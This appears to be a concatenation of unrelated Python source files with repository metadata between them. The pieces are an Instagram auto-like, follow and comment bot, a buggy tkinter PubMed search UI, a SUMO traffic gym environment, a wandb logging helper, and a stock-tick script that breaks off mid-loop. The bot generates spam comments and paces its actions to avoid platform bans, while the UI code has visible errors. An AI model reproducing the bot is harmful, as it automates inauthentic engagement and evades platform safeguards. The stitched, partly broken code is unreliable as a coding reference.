is_fake_account = False
is_active_user = False
is_following = False
is_follower = False
is_rejected = False
is_self_checking = False
is_by_tag = False
is_follower_number = 0
self_following = 0
self_follower = 0
# Log setting.
log_file_path = ''
log_file = 0
# Other.
user_id = 0
media_by_tag = 0
media_on_feed = []
media_by_user = []
login_status = False
# For new_auto_mod
next_iteration = {"Like": 0, "Follow": 0, "Unfollow": 0, "Comments": 0}
def __init__(self,
login,
password,
like_per_day=1000,
media_max_like=50,
media_min_like=0,
follow_per_day=0,
follow_time=5 * 60 * 60,
unfollow_per_day=0,
comment_list=[["this", "the", "your"],
["photo", "picture", "pic", "shot", "snapshot"],
["is", "looks", "feels", "is really"],
["great", "super", "good", "very good", "good",
"wow", "WOW", "cool", "GREAT", "magnificent",
"magical", "very cool", "stylish", "beautiful",
"so beautiful", "so stylish", "so professional",
"lovely", "so lovely", "very lovely", "glorious",
"so glorious", "very glorious", "adorable",
"excellent", "amazing"],[".", "..", "...", "!",
"!!", "!!!"]],
comments_per_day=0,
tag_list=['cat', 'car', 'dog'],
max_like_for_one_tag=5,
unfollow_break_min=15,
unfollow_break_max=30,
log_mod=0,
proxy="",
user_blacklist={},
tag_blacklist=[],
unwanted_username_list=[],
unfollow_whitelist=[]):
self.bot_start = datetime.datetime.now()
self.unfollow_break_min = unfollow_break_min
self.unfollow_break_max = unfollow_break_max
self.user_blacklist = user_blacklist
self.tag_blacklist = tag_blacklist
self.unfollow_whitelist = unfollow_whitelist
self.comment_list = comment_list
self.time_in_day = 24 * 60 * 60
# Like
self.like_per_day = like_per_day
if self.like_per_day != 0:
self.like_delay = self.time_in_day / self.like_per_day
# Follow
self.follow_time = follow_time
self.follow_per_day = follow_per_day
if self.follow_per_day != 0:
self.follow_delay = self.time_in_day / self.follow_per_day
# Unfollow
self.unfollow_per_day = unfollow_per_day
if self.unfollow_per_day != 0:
self.unfollow_delay = self.time_in_day / self.unfollow_per_day
# Comment
self.comments_per_day = comments_per_day
if self.comments_per_day != 0:
self.comments_delay = self.time_in_day / self.comments_per_day
# Don't like if media have more than n likes.
self.media_max_like = media_max_like
# Don't like if media have less than n likes.
self.media_min_like = media_min_like
# Auto mod seting:
# Default list of tag.
self.tag_list = tag_list
# Get random tag, from tag_list, and like (1 to n) times.
self.max_like_for_one_tag = max_like_for_one_tag
# log_mod 0 to console, 1 to file
self.log_mod = log_mod
self.s = requests.Session()
# if you need proxy make something like this:
# self.s.proxies = {"https" : "http://proxyip:proxyport"}
# by @ageorgios
if proxy != "":
proxies = {
'http': 'http://' + proxy,
'https': 'http://' + proxy,
}
self.s.proxies.update(proxies)
# convert login to lower
self.user_login = login.lower()
self.user_password = password
self.bot_mode = 0
self.media_by_tag = []
self.media_on_feed = []
self.media_by_user = []
self.unwanted_username_list = unwanted_username_list
now_time = datetime.datetime.now()
log_string = 'Instabot v1.1.0 started at %s:\n' % \
(now_time.strftime("%d.%m.%Y %H:%M"))
self.write_log(log_string)
self.login()
self.populate_user_blacklist()
signal.signal(signal.SIGTERM, self.cleanup)
atexit.register(self.cleanup)
def populate_user_blacklist(self):
for user in self.user_blacklist:
user_id_url = self.url_user_detail % (user)
info = self.s.get(user_id_url)
# prevent error if 'Account of user was deleted or link is invalid
from json import JSONDecodeError
try:
all_data = json.loads(info.text)
except JSONDecodeError as e:
self.write_log('Account of user %s was deleted or link is '
'invalid' % (user))
else:
# prevent exception if user have no media
id_user = all_data['user']['id']
# Update the user_name with the user_id
self.user_blacklist[user] = id_user
log_string = "Blacklisted user %s added with ID: %s" % (user,
id_user)
self.write_log(log_string)
time.sleep(5 * random.random())
def login(self):
log_string = 'Trying to login as %s...\n' % (self.user_login)
self.write_log(log_string)
self.s.cookies.update({
'sessionid': '',
'mid': '',
'ig_pr': '1',
'ig_vw': '1920',
'csrftoken': '',
's_network': '',
'ds_user_id': ''
})
self.login_post = {
'username': self.user_login,
'password': self.user_password
}
self.s.headers.update({
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': self.accept_language,
'Connection': 'keep-alive',
'Content-Length': '0',
'Host': 'www.instagram.com',
'Origin': 'https://www.instagram.com',
'Referer': 'https://www.instagram.com/',
'User-Agent': self.user_agent,
'X-Instagram-AJAX': '1',
'X-Requested-With': 'XMLHttpRequest'
})
r = self.s.get(self.url)
self.s.headers.update({'X-CSRFToken': r.cookies['csrftoken']})
time.sleep(5 * random.random())
login = self.s.post(
self.url_login, data=self.login_post, allow_redirects=True)
self.s.headers.update({'X-CSRFToken': login.cookies['csrftoken']})
self.csrftoken = login.cookies['csrftoken']
time.sleep(5 * random.random())
if login.status_code == 200:
r = self.s.get('https://www.instagram.com/')
finder = r.text.find(self.user_login)
if finder != -1:
ui = UserInfo()
self.user_id = ui.get_user_id_by_login(self.user_login)
self.login_status = True
log_string = '%s login success!' % (self.user_login)
self.write_log(log_string)
else:
self.login_status = False
self.write_log('Login error! Check your login data!')
else:
self.write_log('Login error! Connection error!')
def logout(self):
now_time = datetime.datetime.now()
log_string = 'Logout: likes - %i, follow - %i, unfollow - %i, comments - %i.' % \
(self.like_counter, self.follow_counter,
self.unfollow_counter, self.comments_counter)
self.write_log(log_string)
work_time = datetime.datetime.now() - self.bot_start
log_string = 'Bot work time: %s' % (work_time)
self.write_log(log_string)
try:
logout_post = {'csrfmiddlewaretoken': self.csrftoken}
logout = self.s.post(self.url_logout, data=logout_post)
self.write_log("Logout success!")
self.login_status = False
except:
self.write_log("Logout error!")
def cleanup(self, *_):
# Unfollow all bot follow
if self.follow_counter >= self.unfollow_counter:
for f in self.bot_follow_list:
log_string = "Trying to unfollow: %s" % (f[0])
self.write_log(log_string)
self.unfollow_on_cleanup(f[0])
sleeptime = random.randint(self.unfollow_break_min,
self.unfollow_break_max)
log_string = "Pausing for %i seconds... %i of %i" % (
sleeptime, self.unfollow_counter, self.follow_counter)
self.write_log(log_string)
time.sleep(sleeptime)
self.bot_follow_list.remove(f)
# Logout
if (self.login_status):
self.logout()
exit(0)
def get_media_id_by_tag(self, tag):
""" Get media ID set, by your hashtag """
if (self.login_status):
log_string = "Get media id by tag: %s" % (tag)
self.write_log(log_string)
if self.login_status == 1:
url_tag = self.url_tag % (tag)
try:
r = self.s.get(url_tag)
all_data = json.loads(r.text)
self.media_by_tag = list(all_data['tag']['media']['nodes'])
except:
self.media_by_tag = []
self.write_log("Except on get_media!")
else:
return 0
def like_all_exist_media(self, media_size=-1, delay=True):
""" Like all media ID that have self.media_by_tag """
if self.login_status:
if self.media_by_tag != 0:
i = 0
for d in self.media_by_tag:
# Media count by this tag.
if media_size > 0 or media_size < 0:
media_size -= 1
l_c = self.media_by_tag[i]['likes']['count']
if ((l_c <= self.media_max_like and
l_c >= self.media_min_like) or
(self.media_max_like == 0 and
l_c >= self.media_min_like) or
(self.media_min_like == 0 and
l_c <= self.media_max_like) or
(self.media_min_like == 0 and
self.media_max_like == 0)):
for blacklisted_user_name, blacklisted_user_id in self.user_blacklist.items(
):
if self.media_by_tag[i]['owner'][
'id'] == blacklisted_user_id:
self.write_log(
"Not liking media owned by blacklisted user: "
+ blacklisted_user_name)
return False
if self.media_by_tag[i]['owner'][
'id'] == self.user_id:
self.write_log(
"Keep calm - It's your own media ;)")
return False
try:
caption = self.media_by_tag[i][
'caption'].encode(
'ascii', errors='ignore')
tag_blacklist = set(self.tag_blacklist)
if sys.version_info[0] == 3:
tags = {
str.lower(
(tag.decode('ASCII')).strip('#'))
for tag in caption.split()
if (tag.decode('ASCII')
).startswith("#")
}
else:
tags = {
unicode.lower(
(tag.decode('ASCII')).strip('#'))
for tag in caption.split()
if (tag.decode('ASCII')
).startswith("#")
}
if tags.intersection(tag_blacklist):
matching_tags = ', '.join(
tags.intersection(tag_blacklist))
self.write_log(
"Not liking media with blacklisted tag(s): "
+ matching_tags)
return False
except:
self.write_log(
"Couldn't find caption - not liking")
return False
log_string = "Trying to like media: %s" % \
(self.media_by_tag[i]['id'])
self.write_log(log_string)
like = self.like(self.media_by_tag[i]['id'])
# comment = self.comment(self.media_by_tag[i]['id'], 'Cool!')
# follow = self.follow(self.media_by_tag[i]["owner"]["id"])
if like != 0:
if like.status_code == 200:
# Like, all ok!
self.error_400 = 0
self.like_counter += 1
log_string = "Liked: %s. Like #%i." % \
(self.media_by_tag[i]['id'],
self.like_counter)
self.write_log(log_string)
elif like.status_code == 400:
log_string = "Not liked: %i" \
% (like.status_code)
self.write_log(log_string)
# Some error. If repeated - can be ban!
if self.error_400 >= self.error_400_to_ban:
# Look like you banned!
time.sleep(self.ban_sleep_time)
else:
self.error_400 += 1
else:
log_string = "Not liked: %i" \
% (like.status_code)
self.write_log(log_string)
return False
# Some error.
i += 1
if delay:
time.sleep(self.like_delay * 0.9 +
self.like_delay * 0.2 *
random.random())
else:
return True
else:
return False
else:
return False
else:
return False
else:
self.write_log("No media to like!")
def like(self, media_id):
""" Send http request to like media by ID """
if self.login_status:
url_likes = self.url_likes % (media_id)
try:
like = self.s.post(url_likes)
last_liked_media_id = media_id
except:
self.write_log("Except on like!")
like = 0
return like
def unlike(self, media_id):
""" Send http request to unlike media by ID """
if self.login_status:
url_unlike = self.url_unlike % (media_id)
try:
unlike = self.s.post(url_unlike)
except:
self.write_log("Except on unlike!")
unlike = 0
return unlike
def comment(self, media_id, comment_text):
""" Send http request to comment """
if self.login_status:
comment_post = {'comment_text': comment_text}
url_comment = self.url_comment % (media_id)
try:
comment = self.s.post(url_comment, data=comment_post)
if comment.status_code == 200:
self.comments_counter += 1
log_string = 'Write: "%s". #%i.' % (comment_text,
self.comments_counter)
self.write_log(log_string)
return comment
except:
self.write_log("Except on comment!")
return False
def follow(self, user_id):
""" Send http request to follow """
if self.login_status:
url_follow = self.url_follow % (user_id)
try:
follow = self.s.post(url_follow)
if follow.status_code == 200:
self.follow_counter += 1
log_string = "Followed: %s #%i." % (user_id,
self.follow_counter)
self.write_log(log_string)
return follow
except:
self.write_log("Except on follow!")
return False
def unfollow(self, user_id):
""" Send http request to unfollow """
if self.login_status:
url_unfollow = self.url_unfollow % (user_id)
try:
unfollow = self.s.post(url_unfollow)
if unfollow.status_code == 200:
self.unfollow_counter += 1
log_string = "Unfollow: %s #%i." % (user_id,
self.unfollow_counter)
self.write_log(log_string)
return unfollow
except:
self.write_log("Exept on unfollow!")
return False
def unfollow_on_cleanup(self, user_id):
""" Unfollow on cleanup by @rjmayott """
if self.login_status:
url_unfollow = self.url_unfollow % (user_id)
try:
unfollow = self.s.post(url_unfollow)
if unfollow.status_code == 200:
self.unfollow_counter += 1
log_string = "Unfollow: %s #%i of %i." % (
user_id, self.unfollow_counter, self.follow_counter)
self.write_log(log_string)
else:
log_string = "Slow Down - Pausing for 5 minutes so we don't get banned!"
self.write_log(log_string)
time.sleep(300)
unfollow = self.s.post(url_unfollow)
if unfollow.status_code == 200:
self.unfollow_counter += 1
log_string = "Unfollow: %s #%i of %i." % (
user_id, self.unfollow_counter,
self.follow_counter)
self.write_log(log_string)
else:
log_string = "Still no good :( Skipping and pausing for another 5 minutes"
self.write_log(log_string)
time.sleep(300)
return False
return unfollow
except:
log_string = "Except on unfollow... Looks like a network error"
self.write_log(log_string)
return False
def auto_mod(self):
""" Star loop, that get media ID by your tag list, and like it """
if self.login_status:
while True:
random.shuffle(self.tag_list)
self.get_media_id_by_tag(random.choice(self.tag_list))
self.like_all_exist_media(random.randint \
(1, self.max_like_for_one_tag))
def new_auto_mod(self):
while True:
# ------------------- Get media_id -------------------
if len(self.media_by_tag) == 0:
self.get_media_id_by_tag(random.choice(self.tag_list))
self.this_tag_like_count = 0
self.max_tag_like_count = random.randint(
1, self.max_like_for_one_tag)
# ------------------- Like -------------------
self.new_auto_mod_like()
# ------------------- Follow -------------------
self.new_auto_mod_follow()
# ------------------- Unfollow -------------------
self.new_auto_mod_unfollow()
# ------------------- Comment -------------------
self.new_auto_mod_comments()
# Bot iteration in 1 sec
time.sleep(3)
# print("Tic!")
def new_auto_mod_like(self):
if time.time() > self.next_iteration["Like"] and self.like_per_day != 0 \
and len(self.media_by_tag) > 0:
# You have media_id to like:
if self.like_all_exist_media(media_size=1, delay=False):
# If like go to sleep:
self.next_iteration["Like"] = time.time() + \
self.add_time(self.like_delay)
# Count this tag likes:
self.this_tag_like_count += 1
if self.this_tag_like_count >= self.max_tag_like_count:
self.media_by_tag = [0]
# Del first media_id
del self.media_by_tag[0]
def new_auto_mod_follow(self):
if time.time() > self.next_iteration["Follow"] and \
self.follow_per_day != 0 and len(self.media_by_tag) > 0:
if self.media_by_tag[0]["owner"]["id"] == self.user_id:
self.write_log("Keep calm - It's your own profile ;)")
return
log_string = "Trying to follow: %s" % (
self.media_by_tag[0]["owner"]["id"])
self.write_log(log_string)
if self.follow(self.media_by_tag[0]["owner"]["id"]) != False:
self.bot_follow_list.append(
[self.media_by_tag[0]["owner"]["id"], time.time()])
self.next_iteration["Follow"] = time.time() + \
self.add_time(self.follow_delay)
def new_auto_mod_unfollow(self):
if time.time() > self.next_iteration["Unfollow"] and \
self.unfollow_per_day != 0 and len(self.bot_follow_list) > 0:
if self.bot_mode == 0:
for f in self.bot_follow_list:
if time.time() > (f[1] + self.follow_time):
log_string = "Trying to unfollow #%i: " % (
self.unfollow_counter + 1)
self.write_log(log_string)
self.auto_unfollow()
self.bot_follow_list.remove(f)
self.next_iteration["Unfollow"] = time.time() + \
self.add_time(self.unfollow_delay)
if self.bot_mode == 1:
unfollow_protocol(self)
def new_auto_mod_comments(self):
if time.time() > self.next_iteration["Comments"] and self.comments_per_day != 0 \
and len(self.media_by_tag) > 0 \
and self.check_exisiting_comment(self.media_by_tag[0]['code']) == False:
comment_text = self.generate_comment()
log_string = "Trying to comment: %s" % (self.media_by_tag[0]['id'])
self.write_log(log_string)
if self.comment(self.media_by_tag[0]['id'], comment_text) != False:
self.next_iteration["Comments"] = time.time() + \
self.add_time(self.comments_delay)
def add_time(self, time):
""" Make some random for next iteration"""
return time * 0.9 + time * 0.2 * random.random()
def generate_comment(self):
c_list = list(itertools.product(*self.comment_list))
repl = [(" ", " "), (" .", "."), (" !", "!")]
res = " ".join(random.choice(c_list))
for s, r in repl:
res = res.replace(s, r)
return res.capitalize()
def check_exisiting_comment(self, media_code):
url_check = self.url_media_detail % (media_code)
check_comment = self.s.get(url_check)
all_data = json.loads(check_comment.text)
if all_data['graphql']['shortcode_media']['owner']['id'] == self.user_id:
self.write_log("Keep calm - It's your own media ;)")
# Del media to don't loop on it
del self.media_by_tag[0]
return True
comment_list = list(all_data['graphql']['shortcode_media']['edge_media_to_comment']['edges'])
for d in comment_list:
if d['node']['owner']['id'] == self.user_id:
self.write_log("Keep calm - Media already commented ;)")
# Del media to don't loop on it
del self.media_by_tag[0]
return True
return False
def auto_unfollow(self):
chooser = 1
current_user = 'abcd'
current_id = '12345'
checking = True
self.media_on_feed = []
if len(self.media_on_feed) < 1:
self.get_media_id_recent_feed()
if len(self.media_on_feed) != 0:
chooser = random.randint(0, len(self.media_on_feed) - 1)
current_id = self.media_on_feed[chooser]['node']["owner"]["id"]
current_user = self.media_on_feed[chooser]['node']["owner"][
"username"]
while checking:
for wluser in self.unfollow_whitelist:
if wluser == current_user:
chooser = random.randint(0,
len(self.media_on_feed) - 1)
current_id = self.media_on_feed[chooser]['node'][
"owner"]["id"]
current_user = self.media_on_feed[chooser]['node'][
"owner"]["username"]
log_string = (
"found whitelist user, starting search again")
self.write_log(log_string)
break
else:
checking = False
if self.login_status:
now_time = datetime.datetime.now()
log_string = "%s : Get user info \n%s" % (
self.user_login, now_time.strftime("%d.%m.%Y %H:%M"))
self.write_log(log_string)
if self.login_status == 1:
url_tag = self.url_user_detail % (current_user)
try:
r = self.s.get(url_tag)
all_data = json.loads(r.text)
self.user_info = all_data['user']
i = 0
log_string = "Checking user info.."
self.write_log(log_string)
while i < 1:
follows = self.user_info['follows']['count']
follower = self.user_info['followed_by']['count']
media = self.user_info['media']['count']
follow_viewer = self.user_info['follows_viewer']
followed_by_viewer = self.user_info[
'followed_by_viewer']
requested_by_viewer = self.user_info[
'requested_by_viewer']
has_requested_viewer = self.user_info[
'has_requested_viewer']
log_string = "Follower : %i" % (follower)
self.write_log(log_string)
log_string = "Following : %s" % (follows)
self.write_log(log_string)
log_string = "Media : %i" % (media)
self.write_log(log_string)
if follower / follows > 2:
self.is_selebgram = True
self.is_fake_account = False
print(' >>>This is probably Selebgram account')
elif follows / follower > 2:
self.is_fake_account = True
self.is_selebgram = False
print(' >>>This is probably Fake account')
else:
self.is_selebgram = False
self.is_fake_account = False
print(' >>>This is a normal account')
if follows / media < 10 and follower / media < 10:
self.is_active_user = True
print(' >>>This user is active')
else:
self.is_active_user = False
print(' >>>This user is passive')
if follow_viewer or has_requested_viewer:
self.is_follower = True
print(" >>>This account is following you")
else:
self.is_follower = False
print(' >>>This account is NOT following you')
if followed_by_viewer or requested_by_viewer:
self.is_following = True
print(' >>>You are following this account')
else:
self.is_following = False
print(' >>>You are NOT following this account')
i += 1
except:
media_on_feed = []
self.write_log("Except on get_info!")
time.sleep(20)
return 0
else:
return 0
if self.is_selebgram is not False or self.is_fake_account is not False or self.is_active_user is not True or self.is_follower is not True:
print(current_user)
self.unfollow(current_id)
try:
del self.media_on_feed[chooser]
except:
self.media_on_feed = []
self.media_on_feed = []
def get_media_id_recent_feed(self):
if self.login_status:
now_time = datetime.datetime.now()
log_string = "%s : Get media id on recent feed" % (self.user_login)
self.write_log(log_string)
if self.login_status == 1:
url_tag = 'https://www.instagram.com/?__a=1'
try:
r = self.s.get(url_tag)
all_data = json.loads(r.text)
self.media_on_feed = list(
all_data['graphql']['user']['edge_web_feed_timeline'][
'edges'])
log_string = "Media in recent feed = %i" % (
len(self.media_on_feed))
self.write_log(log_string)
except:
self.media_on_feed = []
self.write_log("Except on get_media!")
time.sleep(20)
return 0
else:
return 0
def write_log(self, log_text):
""" Write log by print() or logger """
if self.log_mod == 0:
try:
print(log_text)
except UnicodeEncodeError:
print("Your text has unicode problem!")
elif self.log_mod == 1:
# Create log_file if not exist.
if self.log_file == 0:
self.log_file = 1
now_time = datetime.datetime.now()
self.log_full_path = '%s%s_%s.log' % (
self.log_file_path, self.user_login,
now_time.strftime("%d.%m.%Y_%H:%M"))
formatter = logging.Formatter('%(asctime)s - %(name)s '
'- %(message)s')
self.logger = logging.getLogger(self.user_login)
self.hdrl = logging.FileHandler(self.log_full_path, mode='w')
self.hdrl.setFormatter(formatter)
self.logger.setLevel(level=logging.INFO)
self.logger.addHandler(self.hdrl)
# Log to log file.
try:
self.logger.info(log_text)
except UnicodeEncodeError:
print("Your text has unicode problem!")
| [
"root@localhost.localdomain"
] | root@localhost.localdomain |
c6c4d8e35d0129f75e49d92bfe882b3936490218 | 56892b9b1cf1f7d674a79d6e2fe0a0a0062441e6 | /lipidnetui.py | 42cf124484e7e69e361bf30db2b69994ce0a9437 | [] | no_license | mannerhybrid/lipidnet | d6ddaf68e898bb67ea94aa08f3af6a9557692c22 | 7421edc5bf9bcceb5196d353fa100241fc744dee | refs/heads/master | 2020-03-19T07:15:41.158632 | 2018-08-28T02:24:28 | 2018-08-28T02:24:28 | 136,099,824 | 0 | 0 | null | 2018-06-05T01:12:20 | 2018-06-05T00:58:28 | null | UTF-8 | Python | false | false | 5,795 | py | # -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
import tkinter as tk
import time
from tkinter import ttk
from Bio import Entrez
from bs4 import BeautifulSoup as soup
Entrez.email = "md.nur.hakim.rosli@gmail.com"
class LipidUI(tk.Tk):
def __init__(self, *args, **kwargs):
base = tk.Tk.__init__(self, *args, **kwargs)
container = tk.Frame(self)
container.pack(side="top", fill="both", expand=True)
container.grid_rowconfigure(0,weight=1)
container.grid_columnconfigure(0, weight=1)
self.frames = {}
for pg in (HomePage, SearchPage, FetchPage):
print(pg)
page = str(pg).replace("<class '__main__.", "")
page = page.replace("'>","")
frame = pg(container, self)
self.frames[page] = frame
frame.grid(row=0, column=0, sticky="nsew")
self.show_frame('HomePage')
def show_frame(self, cont):
cont = str(cont).replace("<class '__main__.", "")
Cont = cont.replace("'>","")
frame = self.frames[Cont]
frame.tkraise()
class HomePage(tk.Frame):
def __init__(self, parent, controller):
tk.Frame.__init__(self, parent)
label = tk.Label(self, text="WELCOME TO LIPIDNET", font='LARGE_FONT')
label.pack(padx=10, pady=10)
button1 = tk.Button(self, text="SEARCH", bg='gold', fg='yellow',
command=lambda: controller.show_frame('SearchPage'))
button1.pack(padx=10, pady=10, side='left')
button2 = tk.Button(self, text="FETCH", bg='gold', fg='yellow',
command=lambda: controller.show_frame('FetchPage'))
button2.pack(padx=10, pady=10, side='right')
class SearchPage(tk.Frame):
def __init__(self, parent, controller):
tk.Frame.__init__(self, parent)
entry = tk.Entry(self)
title = tk.Label(self, text="LIPIDNET SEARCH PAGE", font='LARGE_FONT')
title.pack(padx=10, pady=10)
label = tk.Label(self, text="Please enter search term below:", font='LARGE_FONT')
label.pack(padx=10, pady=10)
entry = tk.Entry(self)
entry.pack(padx=10, pady=10)
self.term = entry.get()
self.progress = ttk.Progressbar(self, orient="horizontal",
length=200, mode="determinate")
searchbutton = tk.Button(self, text="Obtain records", command=self.start)
searchbutton.pack(side="top", padx=10, pady=10)
self.progress = ttk.Progressbar(self, orient="horizontal",
length=200, mode="determinate")
self.progress.pack(side="top")
button1 = tk.Button(self, text="HOME", bg='gold', fg='yellow',
command=lambda: controller.show_frame('HomePage'))
button1.pack(padx=10, pady=10, side='left')
button2 = tk.Button(self, text="FETCH", bg='gold', fg='yellow',
command=lambda: controller.show_frame('FetchPage'))
button2.pack(padx=10, pady=10, side='right')
def start(self):
self.progress["value"] = 0
self.progress["maximum"] = 100
self.start = time.time()
label = tk.Label(self, text="Beginning Search", font='LARGE_FONT')
label.pack(padx=10, pady=10)
s = Entrez.esearch(db="pubmed", term=self.term, retmode="xml").read()
print(s)
idlist = [id.text for id in s.find_all("Id")]
self.update()
self.timetaken = self.end - self.start
timeresult = "Search completed in {} seconds".format(self.timetaken)
full_count = "{} records obtained from a total of {}.".format(s.RetMax.text, s.Count.text)
result = tk.Label(self, text=timeresult)
count = tk.Label(self, text=full_count)
count.pack(padx=10, pady=10)
result.pack(padx=10, pady=10)
def update(self):
self.progress["value"] = 100
self.end = time.time()
class FetchPage(tk.Frame):
def __init__(self, parent, controller):
tk.Frame.__init__(self, parent, bg='yellow')
label = tk.Label(self, text="LIPIDNET FETCH PAGE", font='LARGE_FONT', bg='yellow', fg='gold')
label.pack(padx=20, pady=20)
self.progress = ttk.Progressbar(self, orient="horizontal",
length=200, mode="determinate")
button1 = tk.Button(self, text="HOME", bg='gold', fg='yellow',
command=lambda: controller.show_frame(HomePage))
button1.pack(padx=10, pady=10, side='left')
button2 = tk.Button(self, text="SEARCH", bg='gold', fg='yellow',
command=lambda: controller.show_frame(SearchPage))
button2.pack(padx=10, pady=10, side='right')
self.progress.pack()
def start(self):
self.progress["value"] = 0
self.progress["maximum"] = 100
self.start = time.time()
idlist = Entrez.read(Entrez.esearch(db="pubmed", term=self.term))
label = tk.Label(self, text="Beginning Search", font=LARGE_FONT)
label.pack(padx=10, pady=10)
self.update()
self.timetaken = self.end - self.start
timeresult = "Search completed in {} seconds".format(self.timetaken)
result = tk.Label(self, text=timeresult)
result.pack(padx=10, pady=10)
def update(self):
self.progress["value"] = 100
self.end = time.time()
app = LipidUI()
app.mainloop() | [
"noreply@github.com"
] | noreply@github.com |
02e4329074b8d1394dd9e02cf79281aea4bc695a | a34be2a91093ca9e9f79c8b54d5d82be0ce99f41 | /environments/sumo_gym.py | 4d45cdc1618f7c3ef8e7ff0b13f7926468d6c397 | [] | no_license | ndeshp2s/sumo-gym | 7967e84fd5b752de66403e3a68f012ae55718026 | 0bfa8753f692dbaa3f494a7d88cc18d8572d3f11 | refs/heads/master | 2021-06-20T10:19:33.348471 | 2021-01-21T10:21:05 | 2021-01-21T10:21:05 | 172,554,330 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,446 | py | import os
import sys
import gym
if 'SUMO_HOME' in os.environ:
tools = os.path.join(os.environ['SUMO_HOME'], 'tools')
sys.path.append(tools)
else:
sys.exit("please declare environment variable 'SUMO_HOME'")
import traci
from sumolib import checkBinary
class SumoGym(gym.Env):
def __init__(self):
self.sumo_running = False
self.sumo_config = None
def start_sumo(self):
if not self.sumo_running:
traci.start(self.sumo_cmd)
self.sumo_running = True
def stop_sumo(self):
if self.sumo_running:
traci.close()
sys.stdout.flush()
self.sumo_running = False
def add_ego_vehicle(self, pose = 0.0):
dt = traci.simulation.getDeltaT()
vehicles = traci.vehicle.getIDList()
for i in range(len(vehicles)):
if vehicles[i] == self.ev.id:
try:
traci.vehicle.remove(self.ev.id)
except:
pass
traci.vehicle.addFull(self.config.ev_id, 'routeEgo', depart=None, departPos=str(pose), departSpeed='0', typeID='vType0')
traci.vehicle.setSpeedMode(self.config.ev_id, int('00000',0))
traci.vehicle.setSpeed(self.config.ev_id, 0.0)
traci.vehicle.subscribe(self.config.ev_id, [traci.constants.VAR_SPEED])
def get_ev_speed(self):
return traci.vehicle.getSubscriptionResults(self.config.ev_id) | [
"niranjan.deshpande187@gmail.com"
] | niranjan.deshpande187@gmail.com |
116006e27e9db0ac8a63a39f89b241ebcd2a358a | 3554ca28e1cf94fac1173cfee0498e974872561f | /examples/utils/loggers.py | 6829522c3bcd51222c334db31bbc7ebb0e7b21d9 | [] | no_license | tchaton/lightning-geometric | 4a5aeec847df317804f28772554b411923271019 | a8348aa327d240285a921cb2f927c8f94139ea3f | refs/heads/master | 2023-03-28T15:25:08.060346 | 2020-10-03T17:43:27 | 2020-10-03T17:43:27 | 294,764,248 | 44 | 6 | null | 2021-04-04T09:23:50 | 2020-09-11T17:34:52 | Python | UTF-8 | Python | false | false | 1,733 | py | from typing import Dict
import shutil
import os
import subprocess
import hydra
import inspect
from hydra.utils import instantiate
from pytorch_lightning.loggers import WandbLogger
def initialize_WandbLogger(*args, **kwargs):
keys = [k for k in inspect.signature(WandbLogger.__init__).parameters.keys()][1:-1]
wandb_dict = {k: kwargs.get(k) for k in keys}
try:
commit_sha = (
subprocess.check_output(["git", "rev-parse", "HEAD"])
.decode("ascii")
.strip()
)
except:
commit_sha = "n/a"
try:
gitdiff = subprocess.check_output(["git", "diff"]).decode()
except:
gitdiff = ""
wandb_dict["config"] = {}
wandb_dict["config"].update(kwargs["model_config"])
wandb_dict["config"].update(kwargs["dataset_config"])
wandb_dict["config"].update(
{
"run_path": os.getcwd(),
"commit": commit_sha,
"notes": wandb_dict.get("notes"),
}
)
wandbLogger = WandbLogger(**wandb_dict)
shutil.copyfile(
os.path.join(os.getcwd(), ".hydra/config.yaml"),
os.path.join(os.getcwd(), ".hydra/hydra-config.yaml"),
)
wandbLogger.experiment.save(os.path.join(os.getcwd(), ".hydra/hydra-config.yaml"))
wandbLogger.experiment.save(os.path.join(os.getcwd(), ".hydra/overrides.yaml"))
with open("change.patch", "w") as f:
f.write(gitdiff)
wandbLogger.experiment.save(os.path.join(os.getcwd(), "change.patch"))
return wandbLogger
def initialize_loggers(cfg, *args, **kwargs):
loggers = []
if cfg.log:
for logger in cfg.loggers.loggers:
loggers.append(instantiate(logger, *args, **kwargs))
return loggers | [
"thomas.chaton.ai@gmail.com"
] | thomas.chaton.ai@gmail.com |
fa568dcd357b037a884e720bb3f4b2961b3d5e46 | 343413e76c09d2bd3d009f382d9dcd19c984d58f | /.history/main_20201229180214.py | e7c1f84e7a234bab2a2ddd0a968647204387eebe | [] | no_license | rozbeh1212/cipher | 7b81e640501639cefb0fe6bf100647dd2602291e | abdebdd7d1e155ffab78ce38be8bf28074366c42 | refs/heads/master | 2023-02-04T13:44:36.892470 | 2020-12-29T14:44:10 | 2020-12-29T14:44:10 | 325,314,022 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 991 | py | alphabet = [
'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o',
'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'
'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o',
'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'
]
direction = input("Type 'encode' to encrypt, type 'decode' to decrypt:\n")
text = input("Type your message:\n").lower()
shift = int(input("Type the shift number:\n"))
def caeser(start_text, shipft_amount, cipher_direction):
end_text = ""
for letter in start_text:
position = alphabet.index(position)
if cipher_direction == "decode":
shift_amount *= -1
new_position = position + shift_amount
end_text += alphabet[new_position]
print(f"the {c}d text is {plane_text}")
import art
caeser(start_text=text, shift_amount=shift, cipher_direction=direction)
| [
"eb.mehrdad@gmail.com"
] | eb.mehrdad@gmail.com |
9aa3ab83c5304e5dd042b22eef1c00f745172a1a | b032e30b00ee9a83b6a782b3390ee034f9b79aff | /bin/get_today_ticks.py | a3f1b91350721e7cc1117ef33275ffaa1d7c1781 | [] | no_license | gedong009/stock-selection | ace9cc721bc8790dfa40388a7af014e400976359 | eab69921e422a3e0d7f5cd32c15f4bb98c493a78 | refs/heads/master | 2021-04-27T04:42:28.235282 | 2019-06-01T02:51:28 | 2019-06-01T02:51:28 | 122,584,272 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,796 | py | #encoding: utf-8
import pymysql
import tushare as ts
import sql_model
import pandas as pd
import numpy as np
from debug import p
import threading
import code_redis
import datetime
import time
import debug
def dd(code, mysql_obj=None, threadName=None):
now = datetime.datetime.now()
# 周末退出
if now.weekday() == 5 or now.weekday() == 6:
return 1
today = now.strftime("%Y-%m-%d")
# today = '2018-07-06'
while (True):
